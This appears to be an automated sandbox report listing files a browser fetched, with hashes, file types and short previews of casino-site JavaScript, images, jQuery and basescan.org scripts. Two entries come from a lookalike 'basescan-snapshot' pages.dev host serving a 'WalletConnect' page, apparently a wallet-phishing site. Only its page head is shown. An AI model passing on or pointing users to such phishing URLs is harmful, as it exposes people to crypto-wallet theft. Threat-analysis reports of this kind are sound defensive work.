                                                                                                                                                                                                                                              Preview:import{h as i,e as t,$ as h}from"./manifest-51a3674f.js";import{j as b,b as v,r as U}from"./solid-js-38561dfe.js";import{h as S}from"./http-f4555b94.js";import{b as A}from"./index-adb8672d.js";function P(e){var n=e==null?0:e.length;return n?e[n-1]:void 0}var w=(e=>(e[e.rollAvailable=0]="rollAvailable",e[e.rollPending=1]="rollPending",e[e.rollUnavailable=2]="rollUnavailable",e))(w||{}),a=(e=>(e[e.Claimed=1]="Claimed",e[e.UnClaimed=0]="UnClaimed",e[e.NoReward=-1]="NoReward",e))(a||{});const s="before-user-login-type",l="user-new-spin-finished",I=()=>{localStorage.setItem(l,"true")},F=()=>localStorage.getItem(l),[H]=b(()=>S.get("/account/device/isRegistered")),C=()=>{const[e]=A.checkUserClaimedFreeMoney({enable:()=>i.login}),n=t.initSearchParams.get("spin"),[c,o]=v(!1);return U(()=>{if(e.loading)return;function g(){return e()===a.UnClaimed}function d(){const r=localStorage.getItem(s);if(r)return r;const{isNgHost:f,isIdHost:m}=h.getHostType(t.host);return m||f?"B":Math.random()>.5?"A":"B"}
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):18621
                                                                                                                                                                                                                                              Entropy (8bit):7.899688603285943
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:1YNg7/SmmPc7RlTlvLP66mIi9thwhM7B41wGNFwWj:1YyBmP+RlNLk9tWhIB4xNDj
                                                                                                                                                                                                                                              MD5:67C7C06194C9FBB518FD30A70D8DCFFA
                                                                                                                                                                                                                                              SHA1:DCE9ADC843AC29F76FAE50A102CE2546F852093F
                                                                                                                                                                                                                                              SHA-256:DAB38C3A088BA84CCC78277E2002D9874001B94B2088FF69019937E0ED636881
                                                                                                                                                                                                                                              SHA-512:6CFB217B3F298977DEA38720B0C620B4A638DD7F73D8588A88D93EEF5AE1B80C143D84536613C9FEEB48DB0EC33CFA271777399D4E7443F382C8A228026EDFBB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/6cc52a28-40fc-4a5b-8169-66fd31642b72.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..;N...(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 100, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1427
                                                                                                                                                                                                                                              Entropy (8bit):7.82278759166622
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:cUZ/GLvw0wwOYxbu8UbUJq0rceTuyZL0DAwuOyLK4v4yTb5ybQ9aVAzzs1:ce/cOYxbHJq0rceTuu0EOym4v4GVwQF+
                                                                                                                                                                                                                                              MD5:8610572153D08DBAEBB5C5AB9D2E8516
                                                                                                                                                                                                                                              SHA1:ACDF0F1C42F9C4DBD044C61662AA944D8D50E331
                                                                                                                                                                                                                                              SHA-256:FA9E0D82FBAD9144FEFD2B9093F5D5556B6DC5D8257995CE4192CF3D3CB2A44A
                                                                                                                                                                                                                                              SHA-512:F38203B9EB69D3661A8E02839161B723C96F921BBBB26595E04C583603051575C9FCDAC4C661858501CF0B90F4332BE32E5E1D1962D5271A5CBF2EBA797E905A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d...d.......]....ZIDATx..]o.U.........-.M....pO...ZH+...d/..&.H.P>R.Z$.jQ7F...5HP....R.....Mq.B...&5.pf..u..4.>.m.....|dlG.jVN....T..S.F5.....LZ.Fe5.i..i.+.....W..U..)._MZ......a...j..H..!U.E.......K"!.i..Hl.H.AmJVb.z4+V.Y.hCR.[U.+HA[.K.S....3.N....Qy.J......UdL[lh.PI.2%..Se.....G.Y...*j..i8.)Q...Q.).....T%.BJ...1&R.6....E...|.S...`C.9.r....^.J?..A.z...8..Q..G7J.......r......</g.c(....3.......Y.%..U^N...4.`f.v..`.J..`..T,..r.3..@..)........,j...$]>..wO...`.lI...ylhx..-2$.9..Y...\.L).q.U~.m.?....*W0.4....E.zEP>..3.(2.n.0?...F}"..0.J.3.....;"M".#.y..i......p.D.z...s..wD."..M...B.9...(...L.Y...s..H.qQ$+.....q:./'].U...d.E.....U.{.A..../.L..*.....=....P.....G..13S.?..7..8...Q.........Z.......9..+.........._......r.. ...A..O..a ..aK..a.....#...|.A.9..1....)..?..A6....i.s..v..B..dD...]..p..........-dy.3..}.8.S.E.......5@..&F..(i....e.2.w.J....3_..(.F.!.Ez.M.....].6#...]../s\....8.x+.1C.<d?.G.y...Y...Sr....W........).br....Z.!.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (325)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):326
                                                                                                                                                                                                                                              Entropy (8bit):5.126538413090006
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:FgTIKwoQN8GMmBw5ZELAYmJKv+nrjCuMYphnnRrBhsxlPnRxhn5cQhrEfVJhQdiF:F+YLVQJKGnrjJXxpk3B5c+Yg8H
                                                                                                                                                                                                                                              MD5:EEA9E0E74BCAD9F080807096D8E6A926
                                                                                                                                                                                                                                              SHA1:3510365AB98D0D483522DC4153260E1F4B79590A
                                                                                                                                                                                                                                              SHA-256:CBED0C4ABCB4E0DBA42886314CAC194EF3AA69DF1EE453CEB5ECF576D99B8E55
                                                                                                                                                                                                                                              SHA-512:939D2FF120A18601A564D8A3649619CF53D4AD6B83FE2317757A4E6388179847A0208DDD7C0BBC7A151B754DD52F232E9F2BBEDE22CF607C3725F3591BA010DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/throttle-e4f3954e.js
                                                                                                                                                                                                                                              Preview:import{d as n}from"./debounce-f7740f4e.js";import{i as l}from"./isObject-909534d5.js";var g="Expected a function";function u(t,a,r){var i=!0,e=!0;if(typeof t!="function")throw new TypeError(g);return l(r)&&(i="leading"in r?!!r.leading:i,e="trailing"in r?!!r.trailing:e),n(t,a,{leading:i,maxWait:a,trailing:e})}export{u as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, Unicode text, UTF-8 text, with very long lines (3355)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3360
                                                                                                                                                                                                                                              Entropy (8bit):5.36435787049408
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:1g36JaLWPSCZIE3l7elNAuqICR3saS4VSfU:1g36CWaCZJYljpCR3sV4VR
                                                                                                                                                                                                                                              MD5:69AD3A065B3D457B56360F0913C38EED
                                                                                                                                                                                                                                              SHA1:341893AA1E3A15613B272A7127F136CB2DAD0E7B
                                                                                                                                                                                                                                              SHA-256:704A440CEBE4BA6A0CA683FE8B22D5FCDDF4E43BFF82A64B68FF0600BD500C28
                                                                                                                                                                                                                                              SHA-512:2573BEE72DE00AB76C833AF392C17D1DCA435D59264E70B655B9ABC02A16754FFC9004FE0D522BE6CD506E6C8CE655411963741CF22D4FF5BD3DFB61D37CCD0F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-TJYR_fED.js
                                                                                                                                                                                                                                              Preview:import{ab as m,c as t,ac as f,Q as b,p as _,C as i,l as g,s as u,i as l,t as n,B as v,ad as w,ae as k,a9 as y,f as p,G as B,r as A}from"./index-DD2Zk4iT.js";import{showBlock as Z}from"./Block-LQQkMNS-.js";import{t as S,a as C,b as G,c as P,i as E,d as O,e as I}from"./discord-3fjpJq_P.js";var Q=p('<div class="w-full flex-col center"><div class="mt-4 rounded-full border-solid border-brand font-extrabold center size-12 border-4">18+</div><div class="mt-2 text-lg font-extrabold"></div><p class="mt-4 text-center"></p><span class="mt-4 cursor-pointer mb-6">'),x=p("<img alt=logo class=h-8>");const U=function(){f.pause();const o=b(()=>_.assets(`/logo/logo${i.darken?".png":"_w.png"}`)),e=()=>{m.pop(),f.start(),localStorage.setItem("isOlder18","older")};return t(w,{close:!1,type:"center",class:"w-full sm:w-[480px]",get title(){return(()=>{var r=x();return g(()=>u(r,"src",o())),r})()},get children(){var r=Q(),d=r.firstChild,a=d.nextSibling,c=a.nextSibling,s=c.nextSibling;return l(a,()=>n("Are you
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (12181)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):12186
                                                                                                                                                                                                                                              Entropy (8bit):5.421197589494201
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:8IzI0PJHKqtPvAe3+aQurbqcEImqEuO4fHgDJ/rcy8xL/GQPDV5Xap:9zI0PxKqFIaXq7ImYyrcy8xjGQbV5X6
                                                                                                                                                                                                                                              MD5:5F9C55EC8AB340AAFC6687B76DEFA19A
                                                                                                                                                                                                                                              SHA1:029C3700BD4808E1272587A634DFBC7A2A5FBAB6
                                                                                                                                                                                                                                              SHA-256:66AA59E2AFDD4099286D74FB91F60DA82987F577C43C3EAB126907D03F17728F
                                                                                                                                                                                                                                              SHA-512:B840446CF6DAB60EE35463F50F5EFA5DCDB985E58BD4E1AF375B56998AA440854CDADE2A7C6B2014D84B32CEA870516A4C51EFDE48779531F822E1125BED9B57
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-3c725725.js
                                                                                                                                                                                                                                              Preview:var P=(e,a,r)=>new Promise((s,t)=>{var l=c=>{try{u(r.next(c))}catch(m){t(m)}},o=c=>{try{u(r.throw(c))}catch(m){t(m)}},u=c=>c.done?s(c.value):Promise.resolve(c.value).then(l,o);u((r=r.apply(e,a)).next())});import{c as n,u as L,e as v,s as C,i,t as p,m as Z,a as E}from"./web-13cf6287.js";import{P as q,B as D,p as y,t as ue,u as J,b as Q,h as F,$ as de,e as me,a as S,I as M,w as pe,T as B,x as ge,k as O,S as fe,c as U,D as H,s as j,z as ye}from"./manifest-51a3674f.js";import{a as he}from"./router-3828f409.js";import{o as A,a as xe,j as be,s as we,d as ee,e as te,S as re,u as ve,k as Se,b as I,c as G,E as Ce}from"./solid-js-38561dfe.js";import{C as N}from"./currency-format-1c532f37.js";import{SpinLeaderBoard as _e}from"./index-cb32ccd4.js";import{t as f}from"./i18n-fcfac1d2.js";import{S as $e}from"./sounds-2c4b6e58.js";import{S as Fe,f as Ne,a as Te,b as W}from"./index-99ee4a48.js";import{b as T}from"./index-adb8672d.js";import{h as V}from"./http-f4555b94.js";import{g as R}from"./index-3fd
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 388 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26510
                                                                                                                                                                                                                                              Entropy (8bit):7.945982480634746
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:rnQXzxT6UCUrjfUa1+rCr8ssDc6cqt6JM8O/+YcvIyPak2apFklAYp+y4CIy6TFs:rnQXzDrj6rA0yP1gzkrFJk+QH6Tq3R
                                                                                                                                                                                                                                              MD5:F0D106C5ED35E548665A618333A169CE
                                                                                                                                                                                                                                              SHA1:108F95F2F6ECDB08118787EB4BBF116477FFD34F
                                                                                                                                                                                                                                              SHA-256:292EDB7DD3E211B89C29DDFFF2A227B7ED8D38F44474A2A077312B4C570EC9A9
                                                                                                                                                                                                                                              SHA-512:2BD4C04E48ECA6446E47596BAA85426D35707E54EA86B053FEF1D4940BC749A390B4CA3ACA363BD69AF47464BE7CC7FAF78F1C338D74C43380E5CEF8A06C88EB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............*..:....PLTE.................q..n..q..p..n..r..nno\..quvk........................ktvy...........Z_U.}^vqX..h..oyuZ.._..d..q.._..b..l..j..q..q..r..h..r..s.._..n..r..g..e..b<DD;AC:CD<CD=AC=DE=EF...;BC;DD5??>BC=EF8@A<AC:BB@DH:AB;BC:AB;BC8@A=CC:AB:AB;CC;BC:AC:AB;AB;CC:AB8@A;BC:AB>CC9AA;AB;AC:AB:BC:AB;BC9AB:BB:AB;AB:AB;BB:@A:BC9@B<BB:AB:AB:AB:AA:AB:AB:AB;AC9@A9?@:AB:AB:AA:AB}wZ..folV..mkiT..rVZL..^..s..r..r..n..l..j..j..h..h..g7>?8?@5<=5;<8>?39:6?A..e;GG<FF.........y..t~.rz|........................................................o.~]..f..q..rfhX..o..l..radX..m..q|wZ..g..j..n..p.y[..s..s..r^aT..c..n..j..o..q..rroW..n..a..p..l..`..h..jY[O..c..k..............l....tRNS..xfX..l.|'.#P.9..N[d..>WG|.CO[.5Eqc...>A..4.*.1.................!#%'()*,./02355678::<>@BCEFGHJKMNOPQRTUVXY[]^`abde`.Q.V.Kp...GJLNPQT[YVSQO. +,R^n>CF.~.....r.k2.C.X`...9X......3..@lw..>...8`.....K.e.j..Dv......}...c.IDATx..Y..5..'o.BQ...Z..}.R.B{.7....w..7.. x..xh....=.HA.....23.d........L2
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2023)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):13346
                                                                                                                                                                                                                                              Entropy (8bit):4.990994193525422
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:fedtvVzZN4SHM/WjIxUBvTHb4fAdcdkGVwG/JZ3y1qY6W:mdtvVzZCSHKWjIaBvjb4fAd8kGVwG/JU
                                                                                                                                                                                                                                              MD5:165976920277A44E712629B3265D713D
                                                                                                                                                                                                                                              SHA1:5A9F4AF1CBC2B0FBB38DD9EBFC64AF8843923D25
                                                                                                                                                                                                                                              SHA-256:2B03169693FA3A6AAE1A41473B8F5A4C258314372970EEAEC9E47E56FDA35AA4
                                                                                                                                                                                                                                              SHA-512:EBF8E229AB680A080C40F0FC190C7A541004918F8BD78FB9714F5B638655BB5464995B6CD04D72B5C296AA34ADB4E01290A5F3693F8F251F3B3BF887BC9EAF77
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/hs-megamenu/src/hs.megamenu.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';var MegaMenu=window.MegaMenu||{};MegaMenu=(function(){function MegaMenu(element,options){var self=this;this.$element=$(element);this.options=$.extend(true,{},MegaMenu.defaults,options);this._items=$();Object.defineProperties(this,{itemsSelector:{get:function(){return self.options.classMap.hasSubMenu+','+.self.options.classMap.hasMegaMenu;}},_tempChain:{value:null,writable:true},state:{value:null,writable:true}});this.initialize();}.return MegaMenu;}());MegaMenu.defaults={event:'hover',direction:'horizontal',breakpoint:991,animationIn:false,animationOut:false,rtl:false,hideTimeOut:300,sideBarRatio:1/4,pageContainer:$('body'),classMap:{initialized:'.hs-menu-initialized',mobileState:'.hs-mobile-state',subMenu:'.hs-sub-menu',hasSubMenu:'.hs-has-sub-menu',hasSubMenuActive:'.hs-sub-menu-opened',megaMenu:'.hs-mega-menu',hasMegaMenu:'.hs-has-mega-menu',hasMegaMenuActive:'.hs-mega-menu-opened'},mobileSpeed:400,mobileEasing:'linear',isMenuOpened:false,beforeOpen:functi
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):73
                                                                                                                                                                                                                                              Entropy (8bit):4.596719252462243
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JSO+hX/+HwDRIB2D4VMO+DYQfDn:Ro/+HwNIB2D4he7
                                                                                                                                                                                                                                              MD5:18ED1D921EE75E6E14E6ECBEF83DF24A
                                                                                                                                                                                                                                              SHA1:EBAE7A1B89A951081E0670BAA4AFBD9D303F7979
                                                                                                                                                                                                                                              SHA-256:3BA01552794B8788D8B44F6DA7636DA8C1FEF7553B47C2780770DB7258E33D44
                                                                                                                                                                                                                                              SHA-512:409CA3BCDBFB6C471EC604026EFFAC9C12C574A8B664B878870439C52DB3740980E17E69635FB41C3DD3DE3CE93B2487D746066BBC664AD2E7F80035A889AEBC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{ae as f}from"./assets/manifest-51a3674f.js";export{f as default};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):89664
                                                                                                                                                                                                                                              Entropy (8bit):5.290543045467053
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQvg:SdeIygP3fulzcsz8jlvaDioQ47GKH
                                                                                                                                                                                                                                              MD5:00727D1D5D9C90F7DE826F1A4A9CC632
                                                                                                                                                                                                                                              SHA1:EA61688671D0C3044F2C5B2F2C4AF0A6620AC6C2
                                                                                                                                                                                                                                              SHA-256:A3CF00C109D907E543BC4F6DBC85EB31068F94515251347E9E57509B52EE3D74
                                                                                                                                                                                                                                              SHA-512:69528A4518BF43F615FB89A3A0A06C138C771FE0647A0A0CFDE9B8E8D3650AA3539946000E305B78D79F371615EE0894A74571202B6A76B6EA53B89569E64D5C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js
                                                                                                                                                                                                                                              Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1077)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1078
                                                                                                                                                                                                                                              Entropy (8bit):4.833033466376096
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:w0WRXW/AbI/zWWu+/WQSpV+RGDl1jeu7XYwYUG8iRHp8LkrM:wvRzs/6WPLSpQ8njJY1P8idWwg
                                                                                                                                                                                                                                              MD5:8D31831330824073717CB4EED2199917
                                                                                                                                                                                                                                              SHA1:9B89C6037ACE8B48753FA11CA400ACAD066C9C5D
                                                                                                                                                                                                                                              SHA-256:0237CB64E3A077C175C84102E2EE1EF4B4854BBE7B77B151B7628E7F9B9639E5
                                                                                                                                                                                                                                              SHA-512:687F126E421B910E1620FE0AEBF387DCC489C78D205E368D2C86976DBB7FC5FF32B020D6529CDB905EAF2C0D4B6D388AC04AB3BAAA262347FF97AF7DF666273C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/web-170e0195.js
                                                                                                                                                                                                                                              Preview:const e=globalThis._bc,{Aliases:s,Assets:t,ChildProperties:r,DOMElements:a,DelegatedEvents:n,Dynamic:i,ErrorBoundary:o,For:d,Hydration:l,HydrationScript:c,Index:g,Match:y,NoHydration:p,Portal:S,Properties:m,RequestContext:u,SVGElements:E,SVGNamespace:v,Show:A,Suspense:h,SuspenseList:H,Switch:N,addEventListener:b,assign:P,classList:x,className:D,clearDelegatedEvents:L,createComponent:M,delegateEvents:T,dynamicProperty:f,effect:C,escape:w,generateHydrationScript:R,getAssets:k,getHydrationKey:q,getNextElement:G,getNextMarker:K,getNextMatch:O,getOwner:V,getPropAlias:_,getRequestEvent:B,hydrate:F,innerHTML:I,insert:j,isDev:z,isServer:J,memo:Q,mergeProps:U,render:W,renderToStream:X,renderToString:Y,renderToStringAsync:Z,resolveSSRNode:$,runHydrationEvents:ee,setAttribute:se,setAttributeNS:te,setProperty:re,spread:ae,ssr:ne,ssrAttribute:ie,ssrClassList:oe,ssrElement:de,ssrHydrationKey:le,ssrSpread:ce,ssrStyle:ge,style:ye,template:pe,untrack:Se,use:me,useAssets:ue}=e.h0lnfr;export{b as a,D as
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):20047
                                                                                                                                                                                                                                              Entropy (8bit):7.90999684113945
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:UYNg7/DXMLj6NT0q+RKcMa5GA5CWiO0CVFdYT5RKK:UYyPyuKos/5NcCVFdMh
                                                                                                                                                                                                                                              MD5:6044DB0E34FFC0099E5DDF0F8C27F6BD
                                                                                                                                                                                                                                              SHA1:6A0F7184E50E9DCD75FC1B22907CDB03BBEDADFE
                                                                                                                                                                                                                                              SHA-256:F9BA25B496B4A4002364FBDDE8F023F9E72D7D0D0ACEE9226A4CECCD0FA044DE
                                                                                                                                                                                                                                              SHA-512:B293AA6B3464A050FD209E28D936B7F211A74F5EE000B139DA4BF50F964B9C5BE18C0AC73DD185FDBAB42F4A006444DED02DE4F25A77E1FC6544BFB88E0C18BA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/15029_Gates%20of%20Olympus%201000.png?_v=4&auto=format&dpr=1&w=200
